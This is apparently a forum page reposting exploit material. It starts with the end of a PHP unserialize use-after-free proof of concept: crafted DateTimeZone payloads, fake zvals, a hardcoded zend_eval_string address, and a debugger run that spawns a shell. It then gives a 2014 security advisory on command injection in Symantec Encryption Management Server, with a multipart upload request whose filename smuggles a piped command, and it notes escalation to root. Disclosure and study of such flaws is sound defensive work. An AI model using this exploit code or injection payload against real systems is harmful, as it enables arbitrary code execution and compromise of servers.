'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}'; $x = unserialize($data1); $y = $x[2]; // zend_eval_string()'s address $y[0][0] = "\x6d"; $y[0][1] = "\x1e"; $y[0][2] = "\x35"; $y[0][3] = "\x00"; $y[0][4] = "\x01"; $y[0][5] = "\x00"; $y[0][6] = "\x00"; $y[0][7] = "\x00"; $fakezval2 = ptr2str(0x3b296324286624); // $f($c); $fakezval2 .= ptr2str(0x100b83000); $fakezval2 .= "\x00\x00\x00\x00"; $fakezval2 .= "\x05"; $fakezval2 .= "\x00"; $fakezval2 .= "\x00\x00"; $data2 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;R:4;}s:8:"timezone";s:3:"UTC";}}'; $z = unserialize($data2); function ptr2str($ptr) { $out = ""; for ($i=0; $i<8; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } ?> Test the PoC on the command line, then any PHP code can be executed: $ lldb php (lldb) target create "php" Current executable set to 'php' (x86_64). (lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)" Process 13472 launched: '/usr/bin/php' (x86_64) sh: no job control in this shell sh-3.2$ php -v PHP 5.5.14 (cli) (built: Sep 9 2014 19:09:25) Copyright (c) 1997-2014 The PHP Group Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies sh-3.2$ exit exit Process 13472 exited with status = 0 (0x00000000) (lldb) Source
  10. Vantage Point Security Advisory 2014-007 ======================================== Title: Symantec Encryption Management Server - Remote Command Injection ID: VP-2014-007 Vendor: Symantec Affected Product: Symantec Encryption Gateway Affected Versions: < 3.2.0 MP6 Product Website: http://www.symantec.com/en/sg/gateway-email-encryption/ Author: Paul Craig <paul[at]vantagepoint[dot]sg Summary: --------- Symantec Gateway Email Encryption provides centrally managed email encryption to secure email communications with customers and partners regardless of whether or not recipients have their own email encryption software. With Gateway Email Encryption, organizations can minimize the risk of a data breach while complying with regulatory mandates for information security and privacy. Details: --------- Remote Command Injection vulnerabilities occur when user supplied input is used directly as a command line argument to a fork(), execv() or a CreateProcessA() function. It was found that the binary /usr/bin/pgpsysconf calls the binary /usr/bin/pgpbackup with unfiltered user supplied input when restoring a Database Backup from the Symantec Encryption Management Web Interface . The user supplied 'filename' value is used directly as a command argument, and can be concatenated to include additional commands with the use of the pipe character. This can allow a lower privileged Administrator to compromise the Encryption Management Server. This is demonstrated below in a snippet from pgpsysconf; .text:08058FEA mov dword ptr [ebx], offset aUsrBinPgpbacku ; "/usr/bin/pgpbackup" .text:08058FF0 cmp [ebp+var_1D], 0 .text:08058FF4 jnz short loc_8059049 .text:08058FF6 mov ecx, 4 .text:08058FFB mov edx, 8 .text:08059000 mov eax, 0Ch .text:08059005 mov dword ptr [ebx+ecx], offset unk_807AE50 .text:0805900C mov [ebx+edx], esi .text:0805900F mov dword ptr [ebx+eax], 0 .text:08059016 call _fork ; Bingo.. An example to exploit this vulnerability and run the ping command can be seen below. POST /omc/uploadBackup.event .... .... Content-Disposition: form-data; name="file"; filename="test123|`ping`|-whatever.tar.gz.pgp" This vulnerability can be further exploited to gain local root access by calling the setuid binary pgpsysconf to install a local package file. Fix Information: --------- Upgrade to Symantec Encryption Management Server 3.3.2 MP7. See http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150129_00 for more information Timeline: --------- 2014/11/26: Issue Reported. 2015/01/30: Patch Released. About Vantage Point Security: --------- Vantage Point Security is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture. Web: https://www.vantagepoint.sg/ Contact: office[at]vantagepoint[dot]sg Source
×
×
  • Create New...